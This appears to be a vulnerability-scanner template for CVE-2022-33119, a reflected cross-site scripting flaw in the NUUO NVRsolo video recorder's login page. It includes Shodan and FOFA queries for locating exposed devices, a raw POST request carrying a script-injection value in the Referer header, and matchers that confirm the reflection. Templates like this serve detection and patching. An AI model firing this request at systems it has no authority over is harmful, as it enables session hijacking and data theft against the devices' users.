id: CVE-2022-33119 info: name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting author: arafatansari severity: medium description: | NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software. reference: - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/badboycxcc/badboycxcc classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 epss-score: 0.01644 epss-percentile: 0.82293 cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: nuuo product: nvrsolo_firmware shodan-query: - http.html:"NVRsolo" - http.html:"nvrsolo" fofa-query: body="nvrsolo" tags: cve,cve2022,nvrsolo,xss,nuuo,vuln http: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: "><" language=en&user=user&pass=pass&submit=Login matchers: - type: dsl dsl: - 'contains(header, "text/html")' - 'status_code == 200' - contains(body,'<\"?cmd=') condition: and # digest: 4a0a00473045022100c1eb8d23ab963d5000bdd1aef257ae75befc5502cbc82e2160834b0f075c199d0220397f7b35ebf62db2a78cef19d55b000bbdd48030dc6bbcef3bd71fda1240cb5a:922c64590222798bb761d5b6d8e72950